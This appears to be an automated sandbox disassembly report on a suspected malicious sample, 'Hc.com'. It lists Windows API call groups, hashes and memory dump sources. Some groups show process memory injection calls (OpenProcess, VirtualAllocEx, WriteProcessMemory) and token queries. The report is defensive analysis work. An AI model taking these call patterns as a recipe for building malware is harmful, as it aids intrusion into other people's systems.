                                                                  • Opcode Fuzzy Hash: 03b4a17853c60726384c8618765627949dc3c401d541252ba185e7ef3a6218e9
                                                                  • Instruction Fuzzy Hash: 3441D232A002119FDB20DF78C891A9EB3F6EF8A314F1545A8E915EB351D731AD05CB80
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 00682262
                                                                  • PostMessageW.USER32(00000001,00000201,00000001), ref: 0068230E
                                                                  • Sleep.KERNEL32(00000000,?,?,?), ref: 00682316
                                                                  • PostMessageW.USER32(00000001,00000202,00000000), ref: 00682327
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?), ref: 0068232F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePostSleep$RectWindow
                                                                  • String ID:
                                                                  • API String ID: 3382505437-0
                                                                  • Opcode ID: ee4147f222ed0e500f09ad37e1f432ac95bff18aa6826f1729a7c700bc3fb705
                                                                  • Instruction ID: 53c6d705c59da5f8a7243171f2c4d0bcdacebc623b442ff37364e6e48612ca99
                                                                  • Opcode Fuzzy Hash: ee4147f222ed0e500f09ad37e1f432ac95bff18aa6826f1729a7c700bc3fb705
                                                                  • Instruction Fuzzy Hash: 9C31F4B190021AEFDB04DFA8CD98ADE3BB6EB04315F004329F921EB2D1D7709A40CB90
                                                                  APIs
                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0069CC63,00000000), ref: 0069D97D
                                                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 0069D9B4
                                                                  • GetLastError.KERNEL32(?,00000000,?,?,?,0069CC63,00000000), ref: 0069D9F9
                                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,0069CC63,00000000), ref: 0069DA0D
                                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,0069CC63,00000000), ref: 0069DA37
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                  • String ID:
                                                                  • API String ID: 3191363074-0
                                                                  • Opcode ID: 0c258a4a37390ec8d00fd2ed2fdaeaea8d8f9ac1cdc1a7d1cf755f1f31c50fc7
                                                                  • Instruction ID: e18872ae17662edf2ff44ecad69d4c8971f9f1d3bb7d2985485c226710555484
                                                                  • Opcode Fuzzy Hash: 0c258a4a37390ec8d00fd2ed2fdaeaea8d8f9ac1cdc1a7d1cf755f1f31c50fc7
                                                                  • Instruction Fuzzy Hash: 2C312C71504205EFDF24EFA5D885AAAB7FEEB04354B10443EE546D7650E730EE41DB60
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 006B61E4
                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 006B623C
                                                                  • _wcslen.LIBCMT ref: 006B624E
                                                                  • _wcslen.LIBCMT ref: 006B6259
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 006B62B5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$_wcslen
                                                                  • String ID:
                                                                  • API String ID: 763830540-0
                                                                  • Opcode ID: 771933dafac6519c233c82863ebd90f27ff60f74b8c9a0e180196c7dd545f578
                                                                  • Instruction ID: 65e61e3d6806d5f6df0dd17d70b4eaf1af180a900a1642ad65544dda42c87b27
                                                                  • Opcode Fuzzy Hash: 771933dafac6519c233c82863ebd90f27ff60f74b8c9a0e180196c7dd545f578
                                                                  • Instruction Fuzzy Hash: 662185B19002189BDB209F54CC84AEEB7BEFF04314F144256FA25EB280DB7499C5CF51
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 006A13AE
                                                                  • GetForegroundWindow.USER32 ref: 006A13C5
                                                                  • GetDC.USER32(00000000), ref: 006A1401
                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 006A140D
                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 006A1445
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ForegroundPixelRelease
                                                                  • String ID:
                                                                  • API String ID: 4156661090-0
                                                                  • Opcode ID: eface8eac1f50aa924b259d00c80ed49f4abe38f97ec35036af883135e912118
                                                                  • Instruction ID: 48e00795ff3cab66c110466d142ecfe35fc1dd69056df14eff3781b4b3263f8f
                                                                  • Opcode Fuzzy Hash: eface8eac1f50aa924b259d00c80ed49f4abe38f97ec35036af883135e912118
                                                                  • Instruction Fuzzy Hash: 2421AE76A00214AFDB44EF69D894A9EB7FAEF49340F04843DE84A9B751DA30AC44CF90
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0065D146
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0065D169
                                                                    • Part of subcall function 00653B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00646A79,?,0000015D,?,?,?,?,006485B0,000000FF,00000000,?,?), ref: 00653BC5
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0065D18F
                                                                  • _free.LIBCMT ref: 0065D1A2
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0065D1B1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                  • String ID:
                                                                  • API String ID: 336800556-0
                                                                  APIs
                                                                  • GetLastError.KERNEL32(0000000A,?,?,0064F64E,0064545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00653170
                                                                  • _free.LIBCMT ref: 006531A5
                                                                  • _free.LIBCMT ref: 006531CC
                                                                  • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 006531D9
                                                                  • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 006531E2
                                                                  Similarity
                                                                  • API ID: ErrorLast$_free
                                                                  • String ID:
                                                                  • API String ID: 3170660625-0
                                                                  APIs
                                                                  • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?,?,?,00680C4E), ref: 0068091B
                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?,?), ref: 00680936
                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?,?), ref: 00680944
                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?), ref: 00680954
                                                                  • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?,?), ref: 00680960
                                                                  Similarity
                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 3897988419-0
                                                                  APIs
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 0068F2AE
                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 0068F2BC
                                                                  • Sleep.KERNEL32(00000000), ref: 0068F2C4
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 0068F2CE
                                                                  • Sleep.KERNEL32 ref: 0068F30A
                                                                  Similarity
                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                  • String ID:
                                                                  • API String ID: 2833360925-0
                                                                  APIs
                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00681A60
                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A6C
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A7B
                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A82
                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00681A99
                                                                  Similarity
                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 842720411-0
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00681976
                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00681982
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00681991
                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00681998
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006819AE
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00681916
                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00681922
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00681931
                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00681938
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0068194E
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00690B24,?,00693D41,?,00000001,00663AF4,?), ref: 00690CCB
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00690B24,?,00693D41,?,00000001,00663AF4,?), ref: 00690CD8
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00690B24,?,00693D41,?,00000001,00663AF4,?), ref: 00690CE5
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00690B24,?,00693D41,?,00000001,00663AF4,?), ref: 00690CF2
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00690B24,?,00693D41,?,00000001,00663AF4,?), ref: 00690CFF
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00690B24,?,00693D41,?,00000001,00663AF4,?), ref: 00690D0C
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 006865BF
                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 006865D6
                                                                  • MessageBeep.USER32(00000000), ref: 006865EE
                                                                  • KillTimer.USER32(?,0000040A), ref: 0068660A
                                                                  • EndDialog.USER32(?,00000001), ref: 00686624
                                                                  Similarity
                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 3741023627-0
                                                                  APIs
                                                                  • _free.LIBCMT ref: 0065DAD2
                                                                    • Part of subcall function 00652D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0065DB51,006F1DC4,00000000,006F1DC4,00000000,?,0065DB78,006F1DC4,00000007,006F1DC4,?,0065DF75,006F1DC4), ref: 00652D4E
                                                                    • Part of subcall function 00652D38: GetLastError.KERNEL32(006F1DC4,?,0065DB51,006F1DC4,00000000,006F1DC4,00000000,?,0065DB78,006F1DC4,00000007,006F1DC4,?,0065DF75,006F1DC4,006F1DC4), ref: 00652D60
                                                                  • _free.LIBCMT ref: 0065DAE4
                                                                  • _free.LIBCMT ref: 0065DAF6
                                                                  • _free.LIBCMT ref: 0065DB08
                                                                  • _free.LIBCMT ref: 0065DB1A
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  APIs
                                                                  • _free.LIBCMT ref: 0065262E
                                                                    • Part of subcall function 00652D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0065DB51,006F1DC4,00000000,006F1DC4,00000000,?,0065DB78,006F1DC4,00000007,006F1DC4,?,0065DF75,006F1DC4), ref: 00652D4E
                                                                    • Part of subcall function 00652D38: GetLastError.KERNEL32(006F1DC4,?,0065DB51,006F1DC4,00000000,006F1DC4,00000000,?,0065DB78,006F1DC4,00000007,006F1DC4,?,0065DF75,006F1DC4,006F1DC4), ref: 00652D60
                                                                  • _free.LIBCMT ref: 00652640
                                                                  • _free.LIBCMT ref: 00652653
                                                                  • _free.LIBCMT ref: 00652664
                                                                  • _free.LIBCMT ref: 00652675
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 5e5693bbcc816fd6d6a2442e9cad035da28fb3aab22949255944262ef4e8b755
                                                                  • Instruction ID: cf4b5bd5dcd0ccf52c910fda1808052a24162be065a8931bd934c7ec0df7899e
                                                                  • Opcode Fuzzy Hash: 5e5693bbcc816fd6d6a2442e9cad035da28fb3aab22949255944262ef4e8b755
                                                                  • Instruction Fuzzy Hash: 05F0D0745026129B8B41AF64EC618693BA7BF36792705260AF8149B275C7310A05EF88
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: __freea$_free
                                                                  • String ID: a/p$am/pm
                                                                  • API String ID: 3432400110-3206640213
                                                                  • Opcode ID: b0ab862866e7a4711db69535e5db0678799398944dfdc27de169506d72896f25
                                                                  • Instruction ID: 0a6f68cf401f3bdefe0cebec53fae7f4940c022fcaaf83472fb774747ae287cf
                                                                  • Opcode Fuzzy Hash: b0ab862866e7a4711db69535e5db0678799398944dfdc27de169506d72896f25
                                                                  • Instruction Fuzzy Hash: FFD1E1759002069ACB249F68C855BFAB7B3FF07702F28425AED029F350E3759D89CB90
                                                                  APIs
                                                                    • Part of subcall function 006941FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,006A52EE,?,?,00000035,?), ref: 00694229
                                                                    • Part of subcall function 006941FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,006A52EE,?,?,00000035,?), ref: 00694239
                                                                  • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 006A5419
                                                                  • VariantInit.OLEAUT32(?), ref: 006A550E
                                                                  • VariantClear.OLEAUT32(?), ref: 006A55CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                  • String ID: bnh
                                                                  • API String ID: 2854431205-201681183
                                                                  • Opcode ID: a039c18d654ac93057b6e366164f31bb33b68bd30e719d962207820742ba8da5
                                                                  • Instruction ID: f441b13edd82b638b19af5a1b73632dafce26c5f63563a35aa96fb2ee22e9496
                                                                  • Opcode Fuzzy Hash: a039c18d654ac93057b6e366164f31bb33b68bd30e719d962207820742ba8da5
                                                                  • Instruction Fuzzy Hash: 1BD15C70900609AFCB44EF94D490AEDBBB6FF48304F54812DE406AB292DB31AE86CF50
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 0062D253
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: t5o$t5o$t5o
                                                                  • API String ID: 1385522511-19283736
                                                                  • Opcode ID: e25c0273002b80331f26eabe83b145daada0c4b2349284d65cc8911198f95bf3
                                                                  • Instruction ID: e55436905051a5d54d218b9e9e0bd5a513cbb798550223ed9e6151069a8c5345
                                                                  • Opcode Fuzzy Hash: e25c0273002b80331f26eabe83b145daada0c4b2349284d65cc8911198f95bf3
                                                                  • Instruction Fuzzy Hash: 8F915BB5A00626DFCB14CF58E4946AABBF2FF58314F24815ED945AB350D731EA82CF90
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper_wcslen
                                                                  • String ID: CALLARGARRAY$bnh
                                                                  • API String ID: 157775604-1689748369
                                                                  • Opcode ID: 698a06cb41a7e220b7b41e49e7b077e755909793428b8e107e80817ee3cc800b
                                                                  • Instruction ID: 1b6e7628c50b6c9123469e023767a64626a7a617a737d9ebc4a47beb08aa4317
                                                                  • Opcode Fuzzy Hash: 698a06cb41a7e220b7b41e49e7b077e755909793428b8e107e80817ee3cc800b
                                                                  • Instruction Fuzzy Hash: 2F418D71A00215DFCB04EFA8C881AEEBBB6EF59324F144129F405AB251E7709E81CF90
                                                                  APIs
                                                                    • Part of subcall function 0068BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00682B1D,?,?,00000034,00000800,?,00000034), ref: 0068BDF4
                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 006830AD
                                                                    • Part of subcall function 0068BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00682B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0068BDBF
                                                                    • Part of subcall function 0068BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0068BD1C
                                                                    • Part of subcall function 0068BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00682AE1,00000034,?,?,00001004,00000000,00000000), ref: 0068BD2C
                                                                    • Part of subcall function 0068BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00682AE1,00000034,?,?,00001004,00000000,00000000), ref: 0068BD42
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0068311A
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00683167
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                  • String ID: @
                                                                  • API String ID: 4150878124-2766056989
                                                                  • Opcode ID: d2a330193fe3f4098c464fbe2a66b29155b98599df5b5c4d9c04c54f97abba28
                                                                  • Instruction ID: 5c532c0bee96a45da075ddbb030585c62c775fde6da688e7c51c405c6ec79e57
                                                                  • Opcode Fuzzy Hash: d2a330193fe3f4098c464fbe2a66b29155b98599df5b5c4d9c04c54f97abba28
                                                                  • Instruction Fuzzy Hash: 30412C72900228BFDB10EBA4CD95ADEBBB9EF45700F004199FA45B7280DB706F85CB60
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\280366\Hc.com,00000104), ref: 00651AD9
                                                                  • _free.LIBCMT ref: 00651BA4
                                                                  • _free.LIBCMT ref: 00651BAE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _free$FileModuleName
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                  • API String ID: 2506810119-2668193561
                                                                  • Opcode ID: 6e93480f14bc0cb0830cfb579bc7f7b484fdc2005283bdde1865efe0e8aeae07
                                                                  • Instruction ID: 3cb34c7e30acc291a485f67b5cb2b8ec60e13b6a14bde29400bc489297c7f14c
                                                                  • Opcode Fuzzy Hash: 6e93480f14bc0cb0830cfb579bc7f7b484fdc2005283bdde1865efe0e8aeae07
                                                                  • Instruction Fuzzy Hash: 0A319771A00219AFCB11DF99DC81E9EBBFEEF86711F1041AAFC049B211E6704E45CB94
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0068CBB1
                                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 0068CBF7
                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006F29C0,01536568), ref: 0068CC40
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Delete$InfoItem
